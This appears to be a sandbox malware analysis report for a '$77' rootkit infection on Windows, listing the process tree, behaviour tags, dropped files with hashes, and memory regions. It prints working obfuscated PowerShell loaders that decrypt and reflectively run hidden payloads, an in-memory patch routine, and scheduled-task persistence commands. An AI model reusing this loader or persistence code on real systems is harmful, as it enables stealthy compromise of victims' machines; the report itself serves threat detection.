uNrsxHygMxo).Invoke($nwXnGwTDdBlftMyts,[uint32]8,4,[ref]$HqnVkxuGKl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$nwXnGwTDdBlftMyts,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($cEMOwqEkWnRqgIEje,$nmTXiHraRxyuNrsxHygMxo).Invoke($nwXnGwTDdBlftMyts,[uint32]8,0x20,[ref]$HqnVkxuGKl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+''+[Char](79)+''+[Char](70)+'TW'+[Char](65)+''+'R'+'E').GetValue(''+[Char](36)+''+[Char](55)+'7s'+[Char](116)+''+[Char](97)+''+'g'+''+[Char](101)+''+'r'+'')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1216
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1236
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1288
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1352
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netprofm -p -s netprofm1⤵PID:1372
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1400
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:1908
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Drops file in System32 directory
PID:1496
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1604
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1620
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1732
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1752
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵PID:1772
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1812
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1856
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1872
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1896
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2008
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:2024
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2080
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2248
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2420
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2528
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p1⤵
- Modifies data under HKEY_USERS
PID:2568
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2620
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2640
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2672
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:2684
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2692
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2652
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:796
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3316 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\$77-Built.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:1828 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:424
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\$77-Built.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\$77-Built.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3432 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_228_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_228.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1820 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_228.vbs"4⤵
- Suspicious use of WriteProcessMemory
PID:1036 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_228.bat" "5⤵
- Suspicious use of WriteProcessMemory
PID:3244 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵PID:5116
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('twuxtJhdDPDIItQMfQPnmbwCEvx/ntxfgJ0nkHny+ys='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('THctp9yqCo6/7Mcv5ujKQg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $rAtKb=New-Object System.IO.MemoryStream(,$param_var); $PRHkS=New-Object System.IO.MemoryStream; $iEUZv=New-Object System.IO.Compression.GZipStream($rAtKb, [IO.Compression.CompressionMode]::Decompress); $iEUZv.CopyTo($PRHkS); $iEUZv.Dispose(); $rAtKb.Dispose(); $PRHkS.Dispose(); $PRHkS.ToArray();}function execute_function($param_var,$param2_var){ $eQbdy=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $EfvOS=$eQbdy.EntryPoint; $EfvOS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_228.bat';$UuGWW=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_228.bat').Split([Environment]::NewLine);foreach ($DHocM in $UuGWW) { if ($DHocM.StartsWith(':: ')) { $CoMDu=$DHocM.Substring(3); break; }}$payloads_var=[string[]]$CoMDu.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Users\Admin\AppData\Local\Temp\Install.exe"C:\Users\Admin\AppData\Local\Temp\Install.exe"7⤵
- Executes dropped EXE
PID:2040 -
C:\Users\Admin\AppData\Local\Temp\Client-built.exe"C:\Users\Admin\AppData\Local\Temp\Client-built.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2348 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f8⤵
- Creates scheduled task(s)
PID:1324 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"8⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4484 -
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f9⤵
- Creates scheduled task(s)
PID:236 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵PID:3804
-
C:\Windows\SYSTEM32\schtasks.exe"schtasks" /create /tn "Discord" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe" /rl HIGHEST /f7⤵
- Creates scheduled task(s)
PID:3132 -
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2908
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3456
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵PID:3476
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3864
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:3952
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵PID:3996
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:4036
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵PID:4320
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵PID:4372
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3648
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:2416
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:1920
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:1072
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:1008
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵PID:832
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3016
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding1⤵
- Checks BIOS information in registry
- Checks processor information in registry
PID:4900
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5df472dcddb36aa24247f8c8d8a517bd7
SHA16f54967355e507294cbc86662a6fbeedac9d7030
SHA256e4e0fbc974e6946d20ddfaf22c543fccc4662d28e30530ec710fec149958f9b6
SHA51206383259258a8c32f676ddaf7ea1fec3de7318ff1338f022e03c6b33458f2ce708e073ceb1aa26e3cf37f82dac37c8163b8ebd2de56b8530dffe177845c7adca
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5eb15ee5741b379245ca8549cb0d4ecf8
SHA13555273945abda3402674aea7a4bff65eb71a783
SHA256b605e00d6056ae84f253f22adf37d6561a86d230c26fba8bfb39943c66e27636
SHA5121f71fe8b6027feb07050715107039da89bb3ed5d32da9dca0138c393e0d705ebf3533bcccec49e70a44e0ec0c07809aef6befa097ad4ced18ca17ae98e6df0e4
-
C:\Users\Admin\AppData\Local\Temp\Client-built.exeFilesize
3.1MB
MD54de93a204d54204a0798175c8457a2de
SHA138abe30fa70c599846e0b777d4ee62422781837f
SHA2567333499e805ad534c6f65623adf4600c0484830cefa08c0a75f98b46a929fefb
SHA512e3ae4e2c84dec014dd15bc29faa9767214972eef8bdee9db063f4fbe059549212f17c69f06a78a12880f53a766e357c73eae6763f2452fb4eff2302f5396304a
-
C:\Users\Admin\AppData\Local\Temp\Install.exeFilesize
163KB
MD5b51552b77057c2405f73bbbf9c89234a
SHA14793adbba023f90d2d2ad0ec55199c56de815224
SHA256720e6962d75e37e8b47b160c5b3f60433a341f00abf60041630116b26858fbb0
SHA512564f4104e6e398eeef8acc7ce7cab694b6eebbe4233b7cb359829242b949dc7c5bf124a550a4d0402eb7da19b8bec6c1f6753563b17a8ae36fb639be595b8d66
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lovzdlng.f0x.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Roaming\$77-Rootkit\$77-powershell.exeFilesize
440KB
MD50e9ccd796e251916133392539572a374
SHA1eee0b7e9fdb295ea97c5f2e7c7ba3ac7f4085204
SHA256c7d4e119149a7150b7101a4bd9fffbf659fba76d058f7bf6cc73c99fb36e8221
SHA512e15c3696e2c96874242d3b0731ce0c790387ccce9a83a19634aed4d1efef72ce8b8fa683069950d652b16cd8d5e9daae9910df6d0a75cb74fdbe90ae5186765d
-
C:\Users\Admin\AppData\Roaming\startup_str_228.batFilesize
3.5MB
MD5297d7e65305917b5a212ca9f4b4d99d2
SHA1402192fd3b13ea1fd26403e227ceb119e8569b4c
SHA256cbe56ba5a86d713c4f57d42e3084f9879c379367c46054b805e85922e5654bf9
SHA5126055d50144ca5a3e6c8889a659d63d654a3a84fb2be78ad36335d0877095592b7923e309c9d818ea9d5fc17a7d4f1b61c3318acddb9ea5041cf0fd996e27cb1a
-
C:\Users\Admin\AppData\Roaming\startup_str_228.vbsFilesize
115B
MD5a3eff77a8bb96c7ea21bade46304b184
SHA117d8dc720fe37f86b78b2983e742d826bbdadd04
SHA256b716dbc43ab756db989f684a616834181fe3ca71a848933349fa1e4a0b447515
SHA512ed4625deb3fab7a532418ed9f0189fb109eb92e66e6169b05133e991607bbc4469cb3558c745549b4a2d09c2290b09f310d1bf9efdc2c553de05b4105924a2c7
-
memory/480-141-0x0000021D6D910000-0x0000021D6D93A000-memory.dmpFilesize
168KB
-
memory/480-146-0x0000021D6D910000-0x0000021D6D93A000-memory.dmpFilesize
168KB
-
memory/480-147-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/636-111-0x000002504D340000-0x000002504D36A000-memory.dmpFilesize
168KB
-
memory/636-116-0x000002504D340000-0x000002504D36A000-memory.dmpFilesize
168KB
-
memory/636-117-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/636-109-0x000002504D310000-0x000002504D335000-memory.dmpFilesize
148KB
-
memory/636-110-0x000002504D340000-0x000002504D36A000-memory.dmpFilesize
168KB
-
memory/688-127-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/688-121-0x00000199FDA50000-0x00000199FDA7A000-memory.dmpFilesize
168KB
-
memory/688-126-0x00000199FDA50000-0x00000199FDA7A000-memory.dmpFilesize
168KB
-
memory/708-157-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/708-151-0x0000016797B20000-0x0000016797B4A000-memory.dmpFilesize
168KB
-
memory/708-156-0x0000016797B20000-0x0000016797B4A000-memory.dmpFilesize
168KB
-
memory/996-131-0x000001A57ECF0000-0x000001A57ED1A000-memory.dmpFilesize
168KB
-
memory/996-137-0x00007FFCE2FF0000-0x00007FFCE3000000-memory.dmpFilesize
64KB
-
memory/996-136-0x000001A57ECF0000-0x000001A57ED1A000-memory.dmpFilesize
168KB
-
memory/1216-93-0x000001C1AB990000-0x000001C1AB9BA000-memory.dmpFilesize
168KB
-
memory/1216-94-0x00007FFD22F60000-0x00007FFD23169000-memory.dmpFilesize
2.0MB
-
memory/1216-95-0x00007FFD22780000-0x00007FFD2283D000-memory.dmpFilesize
756KB
-
memory/1820-27-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/1820-30-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/1820-25-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/1820-26-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/1820-21-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/2276-52-0x000001E8F0690000-0x000001E8F09B4000-memory.dmpFilesize
3.1MB
-
memory/2348-70-0x0000000000550000-0x0000000000874000-memory.dmpFilesize
3.1MB
-
memory/3432-0-0x00007FFD020C3000-0x00007FFD020C5000-memory.dmpFilesize
8KB
-
memory/3432-9-0x0000024FFDBD0000-0x0000024FFDBF2000-memory.dmpFilesize
136KB
-
memory/3432-807-0x00007FFD020C3000-0x00007FFD020C5000-memory.dmpFilesize
8KB
-
memory/3432-806-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/3432-14-0x0000024FFE190000-0x0000024FFE62E000-memory.dmpFilesize
4.6MB
-
memory/3432-13-0x0000024FFD4C0000-0x0000024FFD4C8000-memory.dmpFilesize
32KB
-
memory/3432-12-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/3432-11-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/3432-10-0x00007FFD020C0000-0x00007FFD02B82000-memory.dmpFilesize
10.8MB
-
memory/4484-798-0x000000001B180000-0x000000001B232000-memory.dmpFilesize
712KB
-
memory/4484-797-0x0000000002CC0000-0x0000000002D10000-memory.dmpFilesize
320KB
-
memory/4484-801-0x000000001B120000-0x000000001B132000-memory.dmpFilesize
72KB
-
memory/4484-802-0x000000001C5E0000-0x000000001C61C000-memory.dmpFilesize
240KB
-
memory/4812-99-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4812-98-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4812-97-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4812-96-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4812-102-0x00007FFD22F60000-0x00007FFD23169000-memory.dmpFilesize
2.0MB
-
memory/4812-106-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB
-
memory/4812-103-0x00007FFD22780000-0x00007FFD2283D000-memory.dmpFilesize
756KB
-
memory/4812-101-0x0000000140000000-0x0000000140008000-memory.dmpFilesize
32KB